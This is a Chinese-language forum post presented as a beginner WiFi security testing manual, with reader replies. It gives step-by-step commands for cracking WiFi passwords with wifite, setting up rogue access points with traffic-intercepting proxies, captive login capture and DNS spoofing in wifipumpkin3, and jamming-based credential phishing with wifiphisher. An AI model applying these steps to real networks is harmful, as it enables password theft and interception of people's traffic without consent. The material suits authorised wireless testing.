WIFI安全测试手册:入门篇
本帖最后由 梦幻的彼岸 于 2023-2-27 10:46 编辑准备工作
外置网卡:磊科(netcore)NW392
芯片信息
当前此设备需手动安装驱动
apt install realtek-rtl88xxau-dkms //需输入y进行继续安装
注意:由于网络速度,进度69%、85%可能需要等待一段时间
安装完毕,重启
无线网卡状态查询
iwconfig //查看无线信息
Mode:Monitor 可监听附件无线设备通讯
Mode:Managed 可连接附件无线设备
更改网卡工作模式:iwconfig 网卡名称 mode 工作模式,
测试常用模式例举如下
iwconfig wlan0 mode Managed
iwconfig wlan0 mode Monitor
实战讲解
破解WIFI密码,使用wifite工具进行测试
新版本的wifite:https://github.com/kimocoder/wifite2
安装与启动方法:
$ git clone https://github.com/kimocoder/wifite2.git
$ pip3 install -r requirements.txt//安装依赖,正常情况下kali系统内无需执行此命令(依赖满足)
$ cd wifite2
$ sudo ./wifite.py
$ sudo python3 setup.py install //安装到系统选项
备注:当前kali内置wifite版本没有GitHub新 (攻击操作需root权限运行wifite命令)
输入 -h 参数运行显示wifite的帮助信息
输入-h -v参数运行以显示更多帮助信息
此输出信息可查看默认密码包保存路径
GitHub---当前路径wordlist-probable.txt
Kali---usr/share/dict/wordlist-probable.txt
[*]默认攻击方式:
无参数以root权限运行wifite
检测运行设备的无线网卡情况并将无线网卡的模式改为monitor(以检测附近的WIFI通信)
开始自动扫描附件的WIFI设备,直达输入Ctrl+c 暂停
输入Ctrl+c暂停扫描并根据测试目的输入对应参数以开始WIFI密码破解
破解指定设备:输入WiFi对应的序号即可
所有设备:输入“all”参数
[*]攻击指定设备:
可通过 -e参数加设备essid信息进行指定操作
常用组合参数讲解:
备注:这里是在wifite文件夹路径下执行的命令
sudo ./wifite.py --kill -i wlan0 -mac -pow 50--dict /password.txt
杀死冲突进程使用wlan0网卡开启mac地址随机化后使用指定字典攻击信号强度大于或等于50的WIFI设备
欺骗攻击,使用wifipumpkin3工具进行测试
GitHub:https://github.com/P0cL4bs/wifipumpkin3
在线安装手册:https://wifipumpkin3.github.io/docs/getting-started#installation
在kali系统上的安装示例
sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install
注意:scapy警告问题
更新scapy版本
https://github.com/secdev/scapy
[*]创建一个WiFi
set interface wlan0
# 设置将要创建的接入点的名称
set ssid TestWIFI
# 设置noproxy plguin
set proxy noproxy
# 忽略来自pydns_server的所有日志
ignore pydns_server
start
//pumpkinproxy - 用于拦截TCP协议的网络流量的代理。
//captiveflask - 允许阻止用户访问互联网,直到他们打开登录页面。
//noproxy - 运行无代理的重定向流量
搜索到创建的wifi
访问测试网址输入账号密码登录测试
http://testphp.vulnweb.com/login.php
[*]便捷启动脚本
将之前测试的命令保存到以pulp后缀的文件
以--pulp参数加载
[*]代理模式设置
默认 pumpkinproxy //可用于拦截模式的代理
开启代理插件
关闭代理插件
captiveflask代理模式 //连接WIFI后会弹窗的特定页面
捕获到的提交内容
DNS劫持
set interface wlan0
set ssid TestWIFI
set proxy noproxy
ignore pydns_server
use spoof.dns_spoof
set domains wifitest.com
set redirectTo 192.168.70.133
back
start
其它常用命令参数
show //显示可用攻击模块
jobs //显示正在后台运行的攻击模块
ap //显示创建的WIFI信息
proxies //显示可用代理模式与功能
security //WIFI安全模式,可设置密码与保护方式
更改密码
钓鱼攻击,使用Wifiphisher工具进行测试
GitHub:https://github.com/wifiphisher/wifiphisher
注意:需有两个无线设备
自动扫描附件的WIFI设备
选择要测试的目标Enter确认,这里选择验证欺骗模式进行演示
1 - Network Manager Connect
生成需要认证的WIFI
干扰正常WIFI并自动连接生成的WIFI
显示攻击情况
ESC退出并会在终端显示捕获的输入信息
非常厉害,搞个硬件测试下。谢谢分享 貌似是在进行Wifi钓鱼。。 过来学习,多谢分享 感谢楼主分享 好文,感谢! 为生活而战 发表于 2023-2-27 23:24
貌似是在进行Wifi钓鱼。。
具体怎么钓?
楼主太厉害了!! 膜拜大神,感谢 学习一下,谢谢楼主
页:
[1]
2